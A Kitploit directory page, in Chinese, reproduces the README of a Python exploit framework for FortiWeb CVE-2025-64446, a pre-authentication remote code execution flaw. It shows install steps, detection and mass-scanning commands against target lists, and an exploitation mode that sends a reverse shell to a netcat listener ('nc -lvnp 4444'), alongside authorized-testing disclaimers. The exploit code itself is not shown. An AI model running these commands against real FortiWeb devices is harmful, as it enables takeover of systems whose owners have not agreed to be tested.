Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
FortiWeb-cve-2025-64446-RCE-exploit — FortiWeb CVE-2025-64446 漏洞的安全研究工具。自动化利用框架,具备高级日志记录、实时指标、代理调试和专业报告功能。包含重试逻辑、多线程和可配置设置。仅限授权安全测试使用。CVSS 9.8 严重级别。 | Kitploit
工具/GitHubGitHub/cerberusmrxi/fortiweb-cve-2025-64446-rce-exploit
漏洞扫描器漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubcerberusmrxi/fortiweb-cve-2025-64446-rce-exploit

FortiWeb-cve-2025-64446-RCE-exploit

FortiWeb CVE-2025-64446 漏洞的安全研究工具。自动化利用框架,具备高级日志记录、实时指标、代理调试和专业报告功能。包含重试逻辑、多线程和可配置设置。仅限授权安全测试使用。CVSS 9.8 严重级别。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
142个月前尚未审核
分享

FortiWeb CVE-2025-64446 RCE 漏洞利用工具

Python License CVSS CVE Status Version

专业安全研究与漏洞评估框架

安装 · 快速开始 · 使用指南 · 架构 · CLI 参考 · 法律与道德免责声明


概述

FortiWeb Research Tool 是一个 Python 评估框架,用于对 CVE-2025-64446 进行授权检测与分析。该漏洞是一个影响 FortiWeb Web 应用防火墙设备的严重预认证远程代码执行漏洞。

属性详情
作者Sudeepa Wanigarathna
CVECVE-2025-64446
CVSS9.8(严重)
类型身份验证绕过 + 路径遍历 → 任意文件上传 → RCE
受影响版本低于 7.6.7 / 7.8.7 / 8.0.2 的构建版本(请以官方公告为准)
修复方案升级到已修复的 FortiWeb 版本
语言Python 3.7+
入口点exploit.py

关键功能

模式参数用途
检测--detect-only非利用性漏洞指标检测
安全 / 只读--safe-mode跳过会修改状态的利用步骤
批量扫描--targets + --scan-mode并行多目标评估
漏洞利用--target + --lhost仅在授权实验室中执行受控攻击链
演练--dry-run不实际应用更改,演练完整流程
报告--output-dir生成 JSON + HTML 评估报告

漏洞摘要

字段值
CVE 标识符CVE-2025-64446
CVSS 评分9.8(严重)
影响成功利用后可完全控制系统
修复升级到 7.6.7、7.8.7、8.0.2 或更高版本

在确定评估范围之前,请务必对照 Fortinet PSIRT 确认受影响/已修复版本。


📸 截图

使用示例扫描结果
仪表盘扫描结果
HTML 输出
终端输出

安装

git clone https://github.com/CerberusMrXi/FortiWeb-cve-2025-64446-RCE-exploit
cd FortiWeb-cve-2025-64446-RCE-exploit

python3 -m venv venv
source venv/bin/activate          # Linux / macOS
# venv\Scripts\activate           # Windows

pip install -r requirements.txt
python3 exploit.py --help

依赖项

包作用
requests, urllib3HTTP 客户端
rich, colorama, tqdm终端界面与进度显示
pyyaml加载 config.yaml

可选(开发):pytest、black、flake8、mypy、python-dotenv — 参见 requirements.txt。


快速开始

# Vulnerability check only (recommended first)
python3 exploit.py --target https://192.168.1.100:8443 --detect-only

# Safe / read-only checks
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode

# Mass scanning
python3 exploit.py --targets targets.txt --scan-mode --threads 10

# Authorized exploitation (requires listener host)
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444

注意: 利用模式需要 --lhost。如果不打算运行完整攻击链,请使用 --detect-only 或 --safe-mode。


使用指南

检测模式

python3 exploit.py --target https://192.168.1.100:8443 --detect-only
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --verbose
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --timeout 30

检测功能会评估目标可达性、版本提示、API 暴露面、路径遍历指标、身份验证绕过信号以及上传端点的可访问性,并根据这些指标将风险等级划分为:严重 / 高危 / 中危 / 低危。

批量扫描

cat > targets.txt << 'EOF'
https://192.168.1.100:8443
https://192.168.1.101:8443
https://192.168.1.102:8443
EOF

python3 exploit.py --targets targets.txt --scan-mode
python3 exploit.py --targets targets.txt --scan-mode --threads 20 --verbose
python3 exploit.py --targets targets.txt --scan-mode --output-dir ./reports

ScannerManager 通过线程池运行 FortiWebScanner 工作线程,输出 Rich 汇总表格,并生成 scan_report.json / scan_report.html 报告。

利用模式(仅限授权实验室)

# Start your listener first (example)
nc -lvnp 4444

python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --proxy http://127.0.0.1:8080
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --dry-run
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --user-agent "Research/1.0"

配置文件

# config.yaml
target: https://192.168.1.100:8443
lhost: 192.168.1.50
lport: 4444
timeout: 15
threads: 5
verify_ssl: false
verbose: true
proxy: http://127.0.0.1:8080
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
output_dir: reports
log_dir: logs
detect_only: false
safe_mode: false
dry_run: false
python3 exploit.py --config config.yaml
python3 exploit.py --config config.yaml --target https://10.0.0.1:8443 --lport 9999

命令行参数会覆盖从 YAML 加载的配置值。


架构

exploit.py
├── ExploitConfig / ExploitResult / RequestMetrics   # dataclasses
├── LogManager                                       # exploit.log, errors.log, requests.log
├── Banner / StatusDisplay                           # Rich / colorama UI
├── FortiWebScanner                                  # detect-only checks (no exploit chain)
├── ScannerManager                                   # threaded multi-target scans + reports
├── FortiWebExploit                                  # single-target detect / exploit workflow
└── main()                                           # argparse + mode dispatch
组件职责
FortiWebScanner目标可达性、版本、CVE 指标检测
ScannerManager并行扫描、JSON/HTML 汇总、摘要表格
FortiWebExploit配置驱动的会话、重试、指标、报告、可选的利用路径
LogManager结构化文件日志 + 彩色控制台输出

单目标高层流程:

  1. 横幅 / 日志初始化
  2. 可达性及版本探测
  3. 指标检测(非检测/安全模式下执行完整攻击链)
  4. 在 reports/ 下生成 JSON + HTML 报告
  5. 必要时进行清理

功能特性

检测

  • 针对管理 API 路径的路径遍历指标检测
  • 身份验证绕过信号检测
  • 通过常见状态/版本端点探测 FortiWeb 版本
  • API 端点暴露面映射
  • 文件上传端点可访问性检测
  • 综合指标风险评分

报告与可观测性

  • 带时间戳的 JSON 和 HTML 报告
  • 每次请求的指标(状态、延迟、成功率)
  • 独立日志:exploit.log、errors.log、requests.log

操作控制

  • 多线程批量扫描(--threads)
  • 支持 HTTP/HTTPS 代理(例如 Burp)
  • 可配置重试次数/延迟(默认:3 次 / 2 秒)
  • 自定义 User-Agent、超时、SSL 验证开关(--no-verify)
  • 通过 Colorama + Rich 实现彩色控制台输出

生成输出

reports/
├── report_YYYYMMDD_HHMMSS.json
├── report_YYYYMMDD_HHMMSS.html
├── scan_report.json
└── scan_report.html

logs/
├── exploit.log
├── errors.log
└── requests.log

示例 JSON 报告(检测模式)

{
  "metadata": {
    "tool_name": "FortiWeb Research Tool",
    "version": "1.0",
    "author": "Sudeepa Wanigarathna",
    "timestamp": "2026-07-31T00:02:17",
    "mode": "detect"
  },
  "target": {
    "url": "https://192.168.1.100:8443",
    "reachable": true,
    "version": "7.6.0",
    "vulnerable": true,
    "risk_level": "Critical"
  },
  "metrics": {
    "total_requests": 12,
    "average_response_time": 0.42,
    "success_rate": 0.91
  }
}

命令参考

python3 exploit.py [OPTIONS]
下载工具